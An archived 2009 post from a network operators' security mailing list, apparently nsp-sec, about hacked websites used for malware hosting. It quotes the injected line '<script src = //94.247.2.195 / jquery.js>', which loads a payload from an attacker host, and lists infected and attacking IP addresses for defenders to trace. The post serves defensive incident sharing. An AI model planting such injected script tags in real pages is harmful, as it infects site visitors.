[nsp-sec] ATTN AS 12553 malware hosting
Kurt Jaeger
pi at nepustil.net
Thu Apr 16 10:02:48 EDT 2009
Hi!
> Mike Tancsa wrote:
>> One of our customer Windows based websites was hacked (still looking for
>> the initial vector)...
[...]
>> <script src = //94.247.2.195 / jquery.js> </script>
>
> I realize that not everyone can just do this, but we null routed
> 94.247.2.0/23 at our exit/border routers a few months back.
More about this: Have a look at
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
which describes those iframe infections.
We had a site (212.71.195.175) which was infected from
source 115.75.34.254 yesterday around 15:00 CEST (13:00 GMT).
Other sources of infection to site 87.230.6.28 on the 10th of
April, 10:15 CEST (8:15 GMT) (+/- 2 minutes) from those IPs:
FYI, maybe one of you can track those hosts down.
--
MfG/Best regards, Kurt Jaeger 11 years to go !
Dr.-Ing. Nepustil & Co. GmbH fon +49 7123 93006-0 pi at nepustil.net
Rathausstr. 3 fax +49 7123 93006-99
72658 Bempflingen mob +49 171 3101372